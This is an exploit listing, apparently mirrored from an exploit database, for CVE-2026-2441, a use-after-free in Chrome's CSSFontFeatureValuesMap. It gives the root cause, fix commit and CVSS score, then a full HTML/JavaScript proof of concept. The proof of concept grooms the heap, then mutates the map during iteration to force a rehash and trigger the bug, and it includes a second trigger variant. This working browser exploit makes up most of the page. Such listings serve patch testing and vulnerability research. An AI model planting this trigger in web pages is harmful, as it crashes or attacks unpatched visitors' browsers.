Share
## https://sploitus.com/exploit?id=PACKETSTORM:216017
# Exploit Title: Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap
    Use-After-Free
    # Date: 2026-02-23
    # Exploit Author: nu11secur1ty
    # Vendor Homepage: https://www.google.com/chrome/
    # Software Link: https://www.google.com/chrome/
    # Version: Chrome <= 144.x | Chrome < 145.0.7632.75
    # Tested on: Windows 11 / Linux / macOS
    # CVE: CVE-2026-2441
    # Exploit Repository:
    https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-2441
    
    ## Description
    A use-after-free vulnerability exists in Google Chrome's CSS engine (Blink)
    within the CSSFontFeatureValuesMap implementation. When an iterator is
    created over a CSSFontFeatureValuesMap object and the underlying HashMap is
    mutated during iteration, a rehash operation occurs, freeing the original
    memory while the iterator still holds a raw pointer to it. This leads to a
    use-after-free condition that can be exploited to execute arbitrary code
    inside the Chrome sandbox.
    
    The vulnerability was actively exploited in the wild as a zero-day before
    the patch was released.
    
    ## Vulnerable Versions
    - Google Chrome <= 144.x
    - Google Chrome < 145.0.7632.75
    - Microsoft Edge (prior to Chromium 145 update)
    - Opera (prior to 127.0.5778.64)
    - Any Chromium-based browser using affected Blink versions
    
    ## Technical Details
    **Root Cause:** In
    `third_party/blink/renderer/core/css/css_font_feature_values_map.cc`, the
    `FontFeatureValuesMapIterationSource` holds a raw pointer (`const
    FontFeatureAliases* aliases_`) to the internal HashMap. When the map is
    mutated via `set()` or `delete()` during iteration, the HashMap rehashes,
    the old storage is freed, and the pointer becomes dangling.
    
    **Fix:** Commit `63f3cb4864c64c677cd60c76c8cb49d37d08319c` replaces the raw
    pointer with a deep copy (`const FontFeatureAliases aliases_`).
    
    ## CVSS Score
    **8.8 (High)** - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    
    ## Proof of Concept
    
    ```html
    <!DOCTYPE html>
    <!--
      CVE-2026-2441 - CSSFontFeatureValuesMap UAF
      Author: nu11secur1ty
      Date: 2026-02-23
      Repository:
    -->
    
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="author" content="nu11secur1ty">
      <title>CVE-2026-2441 PoC - nu11secur1ty</title>
      <style id="target-style">
        @font-feature-values Target {
          @styleset {
            a:1; b:2; c:3; d:4; e:5; f:6; g:7; h:8;
            i:9; j:10; k:11; l:12; m:13; n:14; o:15;
          }
        }
      </style>
      <style id="groom-style"></style>
    </head>
    <body>
      <h2>CVE-2026-2441 Proof of Concept</h2>
      <p>Author: nu11secur1ty</p>
      <p>Check browser console for output. If browser crashes -> VULNERABLE</p>
    
      <script>
        // =================================================================
        // CVE-2026-2441 Use-After-Free Exploit
        // Author: nu11secur1ty
        // =================================================================
    
        console.log("==========================================");
        console.log("CVE-2026-2441 PoC - nu11secur1ty");
        console.log("==========================================");
    
        // Heap grooming - create stable heap state
        function groomHeap(count) {
          let style = document.getElementById('groom-style');
          if (!style || !style.sheet) return [];
    
          // Clear existing
          while (style.sheet.cssRules.length) {
            try { style.sheet.deleteRule(0); } catch(e) {}
          }
    
          // Create groom objects
          for (let i = 0; i < count; i++) {
            try {
              style.sheet.insertRule(
                `@font-feature-values Groom${i} { @styleset { v${i}: ${i}; } }`,
                style.sheet.cssRules.length
              );
            } catch(e) {}
          }
    
          console.log("[+] Heap groomed with " + count + " objects");
          return Array(count);
        }
    
        // Main exploit logic
        try {
          // Phase 1: Prepare heap
          groomHeap(64);
    
          // Phase 2: Get target map
          let sheet = document.getElementById('target-style').sheet;
          if (!sheet || !sheet.cssRules.length) {
            throw new Error("Target CSS rule not found");
          }
    
          let rule = sheet.cssRules[0];
          let map = rule.styleset;
    
          console.log("[+] CSSFontFeatureValuesMap size: " + map.size);
    
          // Phase 3: Create iterator - RAW POINTER CAPTURED HERE
          console.log("[*] Creating iterator (raw pointer captured)");
          let iterator = map.entries();
          let step = 0;
          let iterations = 0;
    
          // Phase 4: Trigger UAF through mutation + rehash
          console.log("[*] Triggering rehash + UAF...");
    
          while (step < 10) {
            let result = iterator.next();
            if (result.done) break;
    
            let [key, value] = result.value;
            iterations++;
            console.log("  [step " + step + "] Read: " + key + " = " + value);
    
            // MUTATION: delete current key
            map.delete(key);
    
            // MUTATION: massive insert to force rehash
            for (let i = 0; i < 512; i++) {
              map.set("spray_" + step + "_" + i, [i, i+1, i+2]);
            }
    
            step++;
          }
    
          console.log("[*] Completed " + iterations + " iterations");
    
          // Phase 5: Final check
          console.log("[*] Exploit execution complete");
          console.log("[*] If browser crashed: VULNERABLE");
          console.log("[*] If page survived: PATCHED");
          console.log("==========================================");
          console.log("CVE-2026-2441 - nu11secur1ty");
          console.log("Repository:
    https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-2441");
          console.log("==========================================");
    
        } catch (e) {
          console.log("[!] EXCEPTION: " + e.message);
          console.log("[!] This indicates UAF was triggered");
          console.log("[!] CVE-2026-2441 - nu11secur1ty");
        }
    
        // Force layout recalc as additional trigger
        void document.body.offsetWidth;
    
      </script>
    
      <!-- Alternative for...of trigger -->
      <script>
        try {
          let altStyle = document.createElement('style');
          document.head.appendChild(altStyle);
          altStyle.sheet.insertRule(
            '@font-feature-values Alt{@styleset{x:1; y:2; z:3;}}', 0
          );
          let altMap = altStyle.sheet.cssRules[0].styleset;
    
          for (let [k, v] of altMap) {
            altMap.delete(k);
            for (let i = 0; i < 256; i++) {
              altMap.set("alt_" + i, [i]);
            }
            break;
          }
        } catch(e) {
          console.log("[!] Alternative trigger exception: " + e.message);
        }
      </script>
    </body>
    </html>
    
    # Demo:
    [href](https://www.patreon.com/posts/cve-2026-2441-151454779)
    
    -- 
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstorm.news/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>